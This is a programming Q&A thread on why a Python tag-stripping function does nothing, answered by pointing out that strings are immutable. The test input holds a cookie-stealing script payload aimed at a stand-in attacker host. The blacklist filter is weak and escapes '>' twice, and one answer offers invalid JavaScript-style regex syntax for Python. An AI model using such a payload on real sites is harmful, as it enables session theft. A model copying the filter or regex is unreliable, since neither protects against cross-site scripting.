# Why is function not working? Trying to replace words in string

Tags: python, string

I am trying to replace some key words in a string. Here is my function:

```
def clean_code(input):
    input.replace('<script>', " ")
    input.replace('</script>', " ")
    input.replace('<a href>', " ")
    input.replace('</a>', " ")
    input.replace('>', "&gt;")
    input.replace('>', "&lt;")
    return input
```

and here is my other code and the string:

```
string1 = "This blog is STUPID! >\n" \
"<script>document.location='http://some_attacker/cookie.cgi?"\
" +document.cookie </script>"


print '\nstring1 cleaned of code' 
print '------------------------'
print clean_code(string1)
```

My output is as follows, and I'm not sure why nothing has changed

```
string1 cleaned of code
------------------------
This blog is STUPID! >
<script>document.location='http://some_attacker/cookie.cgi? +document.cookie </script>
```

Comment: Apart from the error you're seeing, this is an awfully insufficient defense against even the most basic attacks. The approach doesn't scale well either.

Comment: @delnan it's just for homework, it's not supposed to do anything

Comment: Okay then, as long as you're aware of it and don't try bullshit like that in code that actually serves any requests.

Answer (score 8):

Python strings are **immutable**:

```
input = input.replace('<script>', " ")
input = ...
```

See [`replace` documentation](http://docs.python.org/library/string.html#string.replace):

> **Return a copy of string str** with all occurrences of substring old replaced by new.

Comment: Agh documentation links I lose again

Answer (score 5):

Strings are immutable in Python.  `input.replace('</a>', " ")` does not alter `input`.  You need to assign the result back to `input`.

But really you should use a parser like <s>[BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/)</s> [lxml](http://lxml.de/).

Comment: lxml is recommended these days

Answer (score 3):

`.replace` is not an in-place mutation

Try this

```
def clean_code(input):
    for tokens in [('<script>', " "),('</script>', " "),('<a href>', " "),
                ('</a>', " "),('>', "&gt;"),('>', "&lt;")]:
        input = input.replace(tokens[0], tokens[1])
    return input
```

Answer (score 3):

`String.replace` returns a new string that is the result of the substitution, but does not change the original. To do that, you will have to assign the return value back to the variable, like so:

```
myString = myString.replace("foo", "bar")
```

Furthermore, `input.replace('<a href>', " ")` will only replace the *exact* substring "<a href>". To remove actual links, try `input.replace(/<a\s[^>]*>/, " ")`.